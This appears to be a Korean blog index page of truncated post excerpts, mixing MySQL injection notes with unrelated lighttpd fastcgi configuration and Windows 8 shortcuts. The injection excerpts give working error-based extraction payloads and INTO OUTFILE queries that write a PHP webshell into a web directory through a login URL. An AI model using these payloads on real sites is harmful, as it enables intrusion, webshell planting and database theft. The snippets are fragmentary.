출처 :http://blog.hacktalk.net/mysql-error-based-injection/ ————————————————- Mysql Error Based injection ————————————————- Author : Keith (k3170) Makan Requirements: >A Brain >A browser >Basic SQL (poke around the internet for an SQL manual, it should’nt take long to learn) First off, lets make sure you guys know what Error Based SQL injection is and where you can find some good examples to train..
This article will be about into outfile, a pretty useful feature of MySQL for SQLi attackers. We will take a look at the FILE privilege and the web directory problem first and then think about some useful files we could write on the webserver. Please note that attacking websites you are not allowed to attack is a crime and should not be done. This article is for learning purposes only. As in the..
http 에러 메시지를 통해 절대경로를 취득 후 webshell upload http://test.com/login/login.php?user_id=admin';select '' INTO OUTFILE 'C:/APM_Setup/htdocs/abc.php';#user_pw=1234!@#$ webshell 실행 화면 UNION 구문을 이용한 방법 select ... where id=30 and 1=0 union select 0x[PHP source hex encoded] into outfile ('/var/www/pwned.php') ※ 공격 성공을 위한 조건 mysql's user has rights of writing files. linux's user "mysql" has right +w on /var..
출처 : http://hellsonic.tistory.com/entry/Error-Based-MYSQL-InjectionError Based MYSQL Injection mysql> select 1 from dual where 1=1 and row(1,1)>(select count(*),concat(version(),floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1);ERROR 1062 (23000): Duplicate entry '5.1.41-community1' for key 'group_key' mysql> select 1 from dual where 1=1 and ExtractValue(1,c..
db querycurrent db_name+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) number of dps+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM inform..
Make sure php support fastcgiType any one of the following command to verify that php support fastcgi $ php -vOutput:PHP 5.0.4 (cli) (built: Nov 8 2005 08:27:12) Copyright (c) 1997-2004 The PHP Group Zend Engine v2.0.4-dev, Copyright (c) 1998-2004 Zend TechnologiesOR $ php-cgi -v Output:PHP 5.0.4 (cgi-fcgi) (built: Nov 8 2005 08:25:54) Copyright (c) 1997-2004 The PHP Group Zend Engine v2.0.4-dev..
lighttpd 설정 파일 위치에 php-fcgi.conf파일 만들어 주면 됩니다. server.modules += ( "mod_fastcgi" ) fastcgi.server = ( ".php" => ( "localhost" => ( "socket" => "/tmp/php-fcgi.sock", "bin-path" => "/cb3pp/bin/php", "max-procs" => 1, "bin-environment" => ( "PHP_FCGI_CHILDREN" => "1", "PHP_FCGI_MAX_REQUESTS" => "500" ) ) ) )
단축키윈도우키 - 메트로 화면과 데스크탑화면 번갈아 보여줌윈도우 + i - 종료,소리등을 컨트롤할 수 있는 설정메뉴윈도우 + L - 잠금화면윈도우 + C - 참메뉴윈도우 + D - 데스크탑화면윈도우 + X - 관리도구메뉴윈도우 + Tab - 백그라운드로 실행중인 프로그램 목록윈도우 + Ctrl + Tab - 백그라운드로 실행중인 프로그램 목록 계속 띄워두기윈도우 + .(점) - 실행중인 메트로 앱을 좌나 우로 보조화면으로 띄우기(우 - 좌 - 전체 반복)윈도우 + 숫자 - 작업 표시줄에 고정되어 있는 프로그램 실행(숫자 순서대로)윈도우 + 프린트키 - 스크린샷이 내 사진에 저장됩니다. 활용 팁- 어플 여러개 실행시 왼쪽 구석탱이에 갖다댄후 위나 아래로 내리면 백그라운드에서 실행중인 프로그램 목록이 뜨는데..
